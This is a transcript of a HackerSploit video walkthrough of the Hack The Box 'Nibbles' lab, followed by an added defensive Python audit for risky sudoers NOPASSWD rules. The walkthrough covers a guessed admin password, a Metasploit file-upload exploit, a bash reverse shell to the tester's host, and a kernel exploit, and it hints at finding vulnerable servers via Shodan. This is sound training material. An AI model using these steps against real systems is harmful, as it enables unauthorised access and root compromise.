HackTheBox Nibbles - Exploiting Arbitrary File Upload

Captions
Hey guys, HackerSploit here, back again with another video. Welcome back to the OSCP prep series. In this video we're going to be taking a look at Nibbles on Hack The Box. This is one of those boxes that are actually quite fun and useful in regards to preparing for your OSCP certification. It's a Linux box, and I'm going to be exploring the process of gaining initial access and of course performing privilege escalation, the objective being to obtain root access so you can obtain all the flags. That being said, it's a fairly simple box, but I think it has quite a few interesting techniques that I wanted to highlight, and I'll be showing you how to use various tools and scripts to perform enumeration.

Before I actually get started with that, I just want to update you on the current situation regarding the video releases and the schedule that I've worked on. You can expect at least three videos per week. They'll range over various topics, from penetration testing and red teaming to web application penetration testing; we're working on a lot of bug bounty content and red team content, so you can expect a lot of that in the coming months. We finally have everything ready to go, and we've worked on a lot of series in the background that we're going to be releasing, so I'm really excited for that. That being said, let's get started.

The first thing we want to do is take a look at the Nmap scan, which I've already performed ahead of time. The results are fairly simple. You can take a look at my Nmap scan options here: I performed a SYN scan, used the advanced option, the timing template was T4, and I scanned all TCP ports and output the results to a file. The IP is going to be different because I performed this scan previously. As for the services running on the target, it's fairly simple: we have SSH running, OpenSSH 7.2p2 on the default port, which is 22, and we also have a web server running on port 80, Apache httpd 2.4.18.

If we access the web server, it simply tells us "Hello world". If we view the source of the page there's nothing; however, at the end we can see an HTML comment saying "nibbleblog directory. nothing interesting here". Given that this is CTF style, we can access it, so we browse to nibbleblog, hit enter, and it takes us directly to what appears to be a content management system called Nibbleblog, as you can see right over here at the bottom, "by Nibbleblog".

I'm going to perform some directory brute forcing. In this video let's try and use DirBuster so I can show you the various options associated with this tool, because I've been using Gobuster quite a bit and I don't want to depend on a single tool. I'll set it to 100 threads. For the wordlist we'll go to /usr/share/wordlists, under dirbuster, and use directory-list-lowercase-2.3-medium.txt; you can use whatever is comfortable for you. For the brute forcing options we want it to be recursive, so we brute force subdirectories as well. We don't perform any fuzzing at the moment because we don't know what we're dealing with per se: we know it's running Apache, that's as far as we know, and we also know it's running Nibbleblog, which we'll research in a second. We'll also enable brute force directories and brute force files so that we can brute force different files. As for the brute force files option, we can specify extensions, so when dealing with a content management system we can specify extensions such as php, html, xml and txt. Based on the web server stack running on the target you can then modify the extensions: for example, if the target was running a Microsoft IIS web server, then of course you can change it to asp and other extensions associated with the web server technology involved. In this case we can pretty much tell that it's running Apache and consequently PHP, so we can hit start now and wait for this to enumerate all the results.

In the meantime we can perform some vulnerability analysis on the content management system, and we'll do that using searchsploit. I'll zoom in here and we'll say searchsploit and search for "nibble". We can see we have two vulnerabilities for Nibbleblog, so it looks like a content management system. Let me drag this to the side for a second and run that one more time. For Nibbleblog version 3 we have multiple SQL injection vulnerabilities, and for Nibbleblog 4.0.3 there's an arbitrary file upload module for Metasploit. We'll get to these in a second.

If we take a look at the directory brute forcing, we have the admin.php page, so let's try and access that: admin.php essentially allows us to log in to the content management system. Let's take a look at a few other directories. I'll duplicate this tab and see what else we're able to identify. We get the feed, and we also get nibbleblog/content/private, so that's a directory, private, under content. If we access that directory, it looks like we have directory listing enabled, and we get XML files containing various configurations. We have the config.xml file, which gives us an email that I think we can utilize, so let me copy that down; I'm going to open up Mousepad and paste it in there. Let's take a look at the other files.

We also have keys.php, which doesn't display anything, obviously; we also have plugins, posts, shadow.php, tags and users. So we have users.xml, and we can see a username, admin. We can try to log in with that, but we don't have a password, because this appears to be just a configuration file that contains the username, the IP, the date and the fail count, or essentially the parameters associated with the login options for that particular user. I'll paste that in there, so we have the username and we have the email. We can actually try and log in with this. I'm going to say admin, and we don't have a password, but we can try and guess: the name of this box is Nibbles, so I'll try nibbles and hit log in. It looks like that worked, so we have access to the content management system, and we can take a look at the settings as to whether we can use this for initial access.

If you remember correctly, we have a Metasploit module that allows us to perform arbitrary file uploads; however, we need to verify that it's running version 4.0.3. Let's see if we can identify the version. Let's head over to the dashboard; we can't see any version enumeration here. If we head over into plugins, let's see what plugins we have: these are simple plugins that extend functionality for this content management system, very similar to WordPress. But we still aren't able to identify the version... actually we do, there we are: Nibbleblog 4.0.3. So we know that works. Let's try and load up this module. I'm going to say msfconsole, and we'll then search for nibble, or nibbleblog as it were. Let's see whether we can find that particular module, so I'm going to say search nibbleblog, and we have it right over there, the arbitrary file upload.

We'll copy that, say use, and paste that in there. Let me reduce the font size so that we have better spacing and organization. The default payload is php/meterpreter/reverse_tcp; that's perfectly fine. If we show the options for this module we can see that we need to provide the password for the admin panel as well as the username; we already have that, we were able to guess it. There's also RPORT, RHOSTS, and TARGETURI, which is nibbleblog. So we can start setting those options. The first thing I want to do is get my IP address; this is going to be the IP address of the tunnel interface, which is the Hack The Box VPN IP, because we're interacting with the target via VPN. We'll say set LHOST and paste the IP there; we'll leave LPORT as it is, that's perfectly fine. The password we know was nibbles, and then we have the RHOSTS option, which we'll set here: I'm going to copy the target IP and paste it in there. The RPORT option is fine. We want to set TARGETURI to nibbleblog, yep, that's correct, and then the username is going to be admin, in lowercase as well. If we show the options now, everything looks like it's set correctly and we can hit run. Let's see whether we get a Meterpreter session on the target system. There we are: it looks like it's sending the stage, it deletes the image that contains the payload, or the stage rather, and we get a Meterpreter session. I'll give that a few seconds to open up, and again let me reduce the font size. Let's see whether we're able to get it; there we are, we get a Meterpreter session. sysinfo shows it's a Linux box, obviously, it looks like it's running Ubuntu, and the name of the computer is Nibbles. getuid: we're currently the user nibbler.

I'm going to open up a shell session here and spawn a bash session with /bin/bash -i. We don't have any job control; that's fine. Let me head over to the home directory and list out the contents. It looks like we have the user flag, which, again, I've already completed this box in the past, so I'll just cat it out here. There we are, we get the user flag. We also have a personal.zip archive, and that's pretty much it.

Let's get some system information. The first thing I'm going to do is get the kernel information: the kernel is 4.4.0-104-generic. If we cat out the distribution information from the /etc release file, we can see it's running Ubuntu 16.04.3 LTS. Our objective now will be to obtain root access. You can see permission denied. Let's try and enumerate the users on the system with cat /etc/passwd: we can see we have the nibbler user, and that's pretty much it in regards to user accounts; the rest are going to be service accounts for SSH, MySQL, etc. We pretty much don't have any other user apart from the root user, which we'll try and utilize. So we can start performing enumeration in regards to identifying vulnerabilities by leveraging various automated enumeration scripts like LinPEAS, LinEnum or the Linux Exploit Suggester. Let's head over into the /tmp directory here, and I'll head over to my Desktop, into the linux enum directory, and let's use the LinEnum script. I'm going to say sudo python -m SimpleHTTPServer and host that on port 80 so that we can transfer the script over to the target; paste in my password there. By the way, I also need my IP address here because we'll need to transfer it with wget; again, there's my VPN IP.

So I'll say wget http:// and my IP, which is 10.10.14.139, and the script we want to download is LinEnum.sh. By the way, you can get more information regarding this script; let me open LinEnum in Google, and this is the script here. If you're interested, this is going to be in the description section. It's an enumeration script for Linux that allows you to perform privilege escalation checks on the target system. I'm going to download the script, there we are, and give it executable permissions with chmod +x LinEnum.sh, and we can now execute it: ./LinEnum.sh. This will give us an overview of all the relevant information pertinent to elevating our privileges on the target system.

Let's head over to the top, because it displays the kernel information and the distribution release information, as well as the current user and other users that have logged on to the system, which is very useful in some cases: who else is logged on using other authentication protocols like SSH. Remember, we have access on the target through a payload, so we are not actually authenticated to the target. We could probably try and utilize the credentials we retrieved and log in via SSH, but in this case we don't need to do that. If we take a look at all the other information here, we can see under the option here that it says we can sudo without supplying a password, so we're able to identify scripts or binaries that we can execute as the root user without providing a password. I've explained this vulnerability before, and in this case it looks like we can execute a script called monitor.sh under the home directory of the nibbler user, which we have access to, so we can actually do this. I'm not sure whether this script exists, because the personal file that we found was a zip archive, so we can probably unzip it or create our own. Then we can create our own monitor.sh script and execute it, and it will perform whatever we want it to do, and of course it's going to run the script with root privileges. You can see right over here "Possible sudo pwnage", and it provides us with the directory and the actual script that we can execute without providing a password. We weren't able to detect any other vulnerabilities: if we take a look at the crontab, we don't have any cron jobs there, nor any systemd timers, and for the processes we pretty much have the standard processes associated with a LAMP stack. So we can try and exploit that. Before I do that, let me copy the actual directory and name of the script and paste it in Mousepad just so we can have it as a reference. There we are, it looks like the scan is completed.

If we head over to the home directory of the user nibbler, we have the personal.zip archive. If we unzip personal.zip, it creates the scripts for us; it essentially unzips that particular directory, personal. cd into personal and stuff, and cat monitor.sh. It looks like it already does stuff. What we can do, ideally, is modify this and make it execute our own arbitrary commands that can provide us with a reverse shell with root privileges. I'm going to remove this script here, because I'm not going to be using the functionality within it. What I'll do on my Kali VM is exit, head back into my Documents, Hack The Box, boxes, nibbles directory, and within this we'll create the script and then transfer it over to the target. So, monitor.sh: because this is a bash script, we're going to say #!/bin/bash, and then I'm going to search for a bash reverse shell, and we'll utilize TCP. Again, PayloadsAllTheThings is a great reference: we'll go to Bash TCP and use the first option there, and we'll add that. I'll head back over into my terminal and paste that in. We now need our IP address, so let me make sure I have that copied; there we are, 10.10.14.139, and the port that we want this script to connect back to is 1234. That should work. I'm going to provide it with executable permissions, chmod +x monitor.sh, and we can now transfer it. I'm going to close this, and we can then serve this particular directory. By the way, the terminal alias right over here called serve is just my own alias that I created that starts up the SimpleHTTPServer module and hosts the files within this particular directory. There we are, and we can now transfer it over to the target, into this particular directory: wget http://10.10.14.139/monitor.sh. We get the script here; again, I'm going to make sure it has executable permissions, chmod +x monitor.sh. Now we can set up our listener: I'm going to terminate that and say nc -nvlp 1234, and then we can execute the script. The way we need to execute it, when we're talking about scripts or binaries with the NOPASSWD flag set, is with the absolute path, so we say /home/nibbler/personal/stuff/monitor.sh and hit enter. We get a connection back on our listener, and you can see we have root access. We can head over into the root directory, and there we are, we have the root flag: cat root.txt, and we get the root flag. So we've been able to elevate our privileges successfully.

However, we can also explore other privilege escalation vectors. For example, we could try and identify whether this particular target is vulnerable to a kernel exploit. What I'll do is terminate my privileged session; there we are, we're back on Kali and on the target. I'm going to head back into the /tmp directory, and we are going to copy over the Linux Exploit Suggester script. However, before we do that, let's try and identify whether we can find any vulnerabilities with searchsploit or on Exploit-DB. Let me get the kernel version, because we are targeting the kernel: it's 4.4.0, so searchsploit 4.4, actually let me say linux 4.4.0 104. We hit enter and see whether we can find any kernel exploits with searchsploit. Right over here we can see we have 4.4.0-116; that's the closest match, and we can try it out. Let me expand this so we can see what this particular exploit does; I'm going to search for it there. We can also try and search for this particular exploit on the web, but if we have the code available here we can try and use it. So 4.4.0: this is local privilege escalation, and the actual script is provided there, so we can try and utilize it. It should work if the kernel version is the same, regardless of the variant, and the version of Ubuntu is the same, although in our case the version of Ubuntu running on the target is 16.04.3, but we can still try. Let's see whether it'll actually work. I'm just going to copy this exploit code: cp /usr/share/exploitdb/exploits/ followed by the actual directory there, and copy it to my current directory. So we have the C file there. Let's open it up and see how this works. It's been tested on that version of Ubuntu, and it looks like it has a payload there, and we can't really deduce what it's doing just by looking at the script, because there isn't any documentation provided along with it.

So what I'll do is search. I'll use the web-search plugin, this is a zsh plugin, so we can search "linux 4.4.0", and we can try and utilize the same version here, so 104 exploit. Let's see whether that provides us with anything. There we are, we have the Exploit-DB code there, and it's pretty much just going to give us what we already have, but no instructions as to how we can execute it. Let's see, this is the double... well, actually, this version is not for our particular version of Ubuntu, and right over here, these ones are not the same as the kernel version running on our target. I don't think we can get much information regarding this particular exploit; although it looks like we have a vulnerability report here, it still doesn't give us an idea of what's going on or how to use this, but we can try and improvise around it.

Now, as I've said before, you never want to run kernel exploits on a target that you haven't tested before. If you're working in a real environment, running a kernel exploit can cause a kernel panic or can actually cause the system to crash, and this applies to both Windows and Linux systems, so you have to be very careful with this. Ideally I don't really want to do this, but we can try compiling it with gcc just to see whether it compiles without providing any compilation options. Looks like it compiles successfully, so again I'm going to provide it with executable permissions, exploit, and then we can serve the files within this directory and transfer it over to the target. I'll do that right now: 10.10.14.139, and it's just called exploit, and we get it successfully. So chmod +x exploit, there we are, and then we run exploit. It looks like it ran; we type in id and we have root access, and if I now get a bash session, we've got root access via the kernel exploit.

I don't think this was actually one of the privilege escalation vectors that you could use, although, as I've just demonstrated, there are multiple ways of gaining access or elevating privileges on a target system. This is fairly applicable because there are still Ubuntu 16.04 servers running on the internet, and you can test this by searching on Shodan for Ubuntu 16.04 servers, or versions of Ubuntu that meet the parameters to run this particular exploit, and you can elevate your privileges using this particular technique. The reason why I showed you this is because when you're dealing with CTF boxes and you have CTF-based privilege escalation vectors like the NOPASSWD option configured for a particular script or binary, that is something you'll find in some cases, but in most cases, if the Linux server has been set up by an experienced system administrator, you'll never find that that particular script is in a directory that any other user apart from the root user can access. So what I'm trying to pass along here is that you should be comfortable exploring various privilege escalation vectors on Linux, and I'll be exploring additional ones in the future, like SUID binaries and a few others that target cron jobs, and so on and so forth.

So that's pretty much it for this video. It's a very interesting box; as I said, it relies heavily on enumeration, especially to gain your initial foothold on the target system, but whenever you're dealing with a content management system it's going to be fairly simple if a vulnerability exists for that content management system. That being said, that's going to be it for this video. Let me know what you guys think in the comments; if you have any questions or suggestions, leave them in the comments section. You can also contact me on Twitter. If you liked this video or found value in it, please leave a like down below, and I'll be seeing you in the next video. A huge thank you to all of our Patreons, your support is greatly appreciated, and this is a formal thank you. So thank you Shamir Douglas, Ryan Carr, Sandor, Michael Busby, Sits Up, Doozy, Defean, Barry, Dustin Empress and Michael Hubbard. Your support is greatly appreciated, and you keep us making even more high quality content for you guys. So thank you.
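Added example, not from the video or from LinEnum, written from the defender's side: a Python audit for the misconfiguration the privilege escalation relied on, a sudoers NOPASSWD entry whose target path the granted user owns, can write, or can create because it does not exist yet. The rules and filesystem model below are constructed samples with paths mirroring the box; on a real host, read the rules from /etc/sudoers and /etc/sudoers.d and pass live_lookup instead of SAMPLE_FS.get.

```python
# Added example, not from the video or LinEnum: audit sudoers-style rules for
# NOPASSWD commands whose path the granted user owns, can write or can create,
# the box's case being a NOPASSWD script under the user's own home directory.
# Group-writable paths and the sticky bit are not modelled.
import os
import re
import stat
from typing import Callable, List, Optional, Tuple

# user host=(runas) [TAG:] cmd1, [TAG:] cmd2 ...
RULE_RE = re.compile(r"^\s*(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
                     r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+?)\s*$")
TAG_RE = re.compile(r"^(?P<tags>(?:[A-Z]+:\s*)+)?(?P<cmd>.*)$")  # "NOPASSWD: /path"
# A lookup returns (owner name, st_mode), or None if the path does not exist.
Lookup = Callable[[str], Optional[Tuple[str, int]]]

def live_lookup(path: str) -> Optional[Tuple[str, int]]:
    """Lookup backed by the real filesystem, for auditing an actual host."""
    import pwd  # Unix only; imported here so the model-based audit runs anywhere
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, st.st_mode

def user_controls_path(path: str, user: str, lookup: Lookup) -> List[str]:
    """Reasons `user` could change what sudo runs at `path`; [] means safe. Walks up
    to '/': owning or world-writing any ancestor lets the user swap or create the file."""
    missing = lookup(path) is None
    current, reasons = path, []
    while not reasons:
        info = lookup(current)
        if info and info[0] == user:
            reasons.append(f"{current} is owned by {user}")
        elif info and info[1] & stat.S_IWOTH:
            reasons.append(f"{current} is world-writable")
        parent = os.path.dirname(current)
        if parent == current:  # reached '/' without finding a weak link
            break
        current = parent
    if reasons and missing:
        reasons.append(f"{path} does not exist, so {user} can create it")
    return reasons

def audit_sudoers(lines: List[str], lookup: Lookup) -> List[Tuple[str, str, str, List[str]]]:
    """Return (user, runas, path, reasons) for every NOPASSWD command the user controls."""
    findings = []
    for line in lines:
        rule = RULE_RE.match(line)
        if not rule or line.lstrip().startswith(("#", "Defaults")) or "_Alias" in line:
            continue
        nopasswd = False
        for segment in rule["cmds"].split(","):
            seg = TAG_RE.match(segment.strip())
            tags = [t.strip() for t in (seg["tags"] or "").split(":") if t.strip()]
            # A tag applies to this and later commands until another tag replaces it.
            nopasswd = "NOPASSWD" in tags or (nopasswd and "PASSWD" not in tags)
            cmd = seg["cmd"].strip()
            if nopasswd and cmd and cmd != "ALL":
                path = cmd.split()[0]  # drop any argument restrictions
                reasons = user_controls_path(path, rule["user"], lookup)
                if reasons:
                    findings.append((rule["user"], rule["runas"] or "root", path, reasons))
    return findings

# Constructed sample rules mirroring the box (not its real sudoers file).
SAMPLE_SUDOERS = """
root    ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
backup  ALL=(root) NOPASSWD: /usr/local/sbin/rotate-logs.sh, PASSWD: /bin/systemctl
""".splitlines()
# Constructed filesystem model, path -> (owner, st_mode): monitor.sh is absent, as on
# the box before personal.zip was unpacked, but every directory under /home/nibbler is nibbler's.
SAMPLE_FS = {p: ("root", 0o40755) for p in ("/", "/home", "/usr", "/usr/local", "/usr/local/sbin")}
SAMPLE_FS.update({"/home/nibbler": ("nibbler", 0o40750),
                  "/home/nibbler/personal": ("nibbler", 0o40755),
                  "/home/nibbler/personal/stuff": ("nibbler", 0o40755),
                  "/usr/local/sbin/rotate-logs.sh": ("root", 0o100755)})
FINDINGS = audit_sudoers(SAMPLE_SUDOERS, SAMPLE_FS.get)
```

Only the nibbler rule is reported: the script is missing and its parent directory belongs to the user, while backup's root-owned script under root-owned directories passes and its PASSWD: command is skipped.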
Info
Channel: HackerSploit
Views: 12,532
Keywords: hackersploit, hacker exploit, hacking, kali linux, linux, linux privilege escalation, linux privilege escalation tryhackme, linux privilege escalation tutorial, gtfobins, gtfobins knife, gtfobins privilege escalation, gtfobins tutorial, hackthebox, hackthebox knife, hackthebox knife writeup, hack the box, hacktehbox, hackthebox invite, hackthebox walkthrough, pwnbox, hackthebox pwnbox, hackthebox buff, hackthebox traceback, hackthebox remote, hackthebox nibbles, htb nibbles
Id: ZAl2Q27oVtc
Length: 28min 10sec (1690 seconds)
Published: Mon Sep 20 2021